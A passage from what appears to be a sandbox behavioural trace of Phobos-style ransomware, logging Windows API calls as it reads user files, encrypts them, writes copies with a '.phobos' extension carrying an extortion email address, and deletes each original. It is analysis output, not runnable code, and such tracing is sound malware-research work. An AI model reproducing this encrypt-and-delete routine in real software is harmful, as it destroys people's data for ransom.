lpOverlapped=0x0) returned 1 [0186.458] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8010, dwBufLen=0x8010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8010) returned 1 [0186.459] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x8010, lpOverlapped=0x0) returned 1 [0186.461] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32aa8) returned 1 [0186.461] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.461] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0186.461] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.461] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0186.461] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.461] CloseHandle (hObject=0x17c) returned 1 [0186.461] CloseHandle (hObject=0x140) returned 1 [0186.462] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms")) returned 1 [0186.463] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.473] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0186.474] CloseHandle (hObject=0x140) returned 1 [0186.474] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.475] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0186.475] CloseHandle (hObject=0x140) returned 1 [0186.475] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.475] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0186.475] CloseHandle (hObject=0x140) returned 1 [0186.475] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.476] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0186.476] CloseHandle (hObject=0x140) returned 1 [0186.476] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\ieonline.microsoft[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\ieonline.microsoft[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.476] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0186.477] CloseHandle (hObject=0x140) returned 1 [0186.477] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.477] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1069056) returned 1 [0186.477] CloseHandle (hObject=0x140) returned 1 [0186.477] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb")) returned 0x2020 [0186.477] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.477] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.477] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.483] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0186.483] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.483] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x105000, lpOverlapped=0x0) returned 1 [0186.667] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x105010, dwBufLen=0x105010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x105010) returned 1 [0186.677] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x105010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x105010, lpOverlapped=0x0) returned 1 [0186.843] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32aa8) returned 1 [0186.843] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.843] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0186.843] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.843] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0186.843] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.843] CloseHandle (hObject=0x140) returned 1 [0186.843] CloseHandle (hObject=0x17c) returned 1 [0186.859] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb")) returned 1 [0186.861] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.906] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1040) returned 1 [0186.906] CloseHandle (hObject=0x178) returned 1 [0186.906] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl")) returned 0x2020 [0186.906] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.906] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.906] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0187.012] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a68) returned 1 [0187.012] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0187.012] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x410, lpOverlapped=0x0) returned 1 [0187.013] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420, dwBufLen=0x420 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420) returned 1 [0187.013] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x420, lpOverlapped=0x0) returned 1 [0187.014] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0187.014] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0187.014] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0187.015] CryptDestroyKey (hKey=0xa32de8) returned 1 [0187.015] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0187.015] CryptDestroyKey (hKey=0xa32a68) returned 1 [0187.015] CloseHandle (hObject=0x178) returned 1 [0187.015] CloseHandle (hObject=0x12c) returned 1 [0187.015] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl")) returned 1 [0187.016] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0187.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0187.017] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1044) returned 1 [0187.017] CloseHandle (hObject=0x12c) returned 1 [0187.017] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl")) returned 0x2020 [0187.017] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0187.017] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0187.017] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0187.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0187.018] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a68) returned 1 [0187.018] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0187.018] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x414, lpOverlapped=0x0) returned 1 [0187.020] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420, dwBufLen=0x420 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420) returned 1 [0187.020] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x420, lpOverlapped=0x0) returned 1 [0187.021] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0187.021] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0187.021] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0187.022] CryptDestroyKey (hKey=0xa32c28) returned 1 [0187.022] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0187.022] CryptDestroyKey (hKey=0xa32a68) returned 1 [0187.022] CloseHandle (hObject=0x12c) returned 1 [0187.022] CloseHandle (hObject=0x178) returned 1 [0187.022] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl")) returned 1 [0187.023] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0187.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0187.024] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1279) returned 1 [0187.024] CloseHandle (hObject=0x178) returned 1 [0187.024] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl")) returned 0x2020 [0187.024] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0187.024] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0187.024] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0187.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0187.025] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a68) returned 1 [0187.025] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0187.025] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4ff, lpOverlapped=0x0) returned 1 [0187.047] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x500, dwBufLen=0x500 | 